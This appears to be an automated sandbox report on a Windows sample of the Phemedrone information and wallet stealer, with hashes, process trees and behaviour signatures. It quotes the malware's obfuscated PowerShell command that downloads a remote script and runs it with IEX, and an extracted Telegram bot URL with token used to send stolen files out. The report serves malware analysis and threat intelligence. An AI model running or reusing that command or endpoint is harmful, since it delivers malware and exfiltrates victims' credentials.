Analysis
-
max time kernel
139s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-11-2024 08:35
Static task
static1
Behavioral task
behavioral1
Sample
86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
Resource
win10v2004-20241007-en
General
-
Target
86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
-
Size
14.2MB
-
MD5
c5d36c7404a03ec6df8024737d97a0c8
-
SHA1
9a213e487337376c38e0cfdac240dc6ffb5fdc1e
-
SHA256
86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354
-
SHA512
812a21f479c56716d892df32a1f910b41310f74de13641d93654a0a722705fb90e114081f2af2ef8c4717febb05715183c0d6deb36bb135f819553c9a9e49216
-
SSDEEP
196608:MUehdkSzJ4bvuLE5rUSW9rWWsPbWIBMWRlHbLVb4zH:M94x5r1CrWWsTWIfN8
Malware Config
Extracted
phemedrone
https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument
Signatures
-
Phemedrone
An information and wallet stealer written in C#.
-
Phemedrone family
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 5076 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
WDSecureUtilities_333.exepid process 3008 WDSecureUtilities_333.exe -
Suspicious behavior: EnumeratesProcesses 52 IoCs
Processes:
powershell.exeWDSecureUtilities_333.exepid process 5076 powershell.exe 5076 powershell.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 3008 WDSecureUtilities_333.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe 5076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWDSecureUtilities_333.exedescription pid process Token: SeDebugPrivilege 5076 powershell.exe Token: SeDebugPrivilege 3008 WDSecureUtilities_333.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.execmd.execmd.execmd.exepowershell.exedescription pid process target process PID 720 wrote to memory of 4880 720 86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe cmd.exe PID 720 wrote to memory of 4880 720 86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe cmd.exe PID 4880 wrote to memory of 3308 4880 cmd.exe cmd.exe PID 4880 wrote to memory of 3308 4880 cmd.exe cmd.exe PID 3308 wrote to memory of 4748 3308 cmd.exe cmd.exe PID 3308 wrote to memory of 4748 3308 cmd.exe cmd.exe PID 4748 wrote to memory of 5076 4748 cmd.exe powershell.exe PID 4748 wrote to memory of 5076 4748 cmd.exe powershell.exe PID 5076 wrote to memory of 3008 5076 powershell.exe WDSecureUtilities_333.exe PID 5076 wrote to memory of 3008 5076 powershell.exe WDSecureUtilities_333.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe"C:\Users\Admin\AppData\Local\Temp\86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""2⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\system32\cmd.execmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"3⤵
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Windows\system32\cmd.execmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"4⤵
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Users\Admin\AppData\Roaming\WDSecureUtilities_333.exe"C:\Users\Admin\AppData\Roaming\WDSecureUtilities_333.exe" -pkek -aoa -y6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
246KB
MD5bcb323eb0cfd10d58cf134bc7bdc8d67
SHA1c34a8c428b715b67b696819fc1d172708a23d3f3
SHA2566d1a5864d641f2da852bfced96a305a41b6464dc12a944883985a4c305a9d8c3
SHA512bac5411c794a1b473b628c5b261bef5a830a6fed5a797c785ac3f3370def8f91db2368db8ea13d91ece0b89ab6109b64e3ecddcd27d15b2d7cc6f29216a57255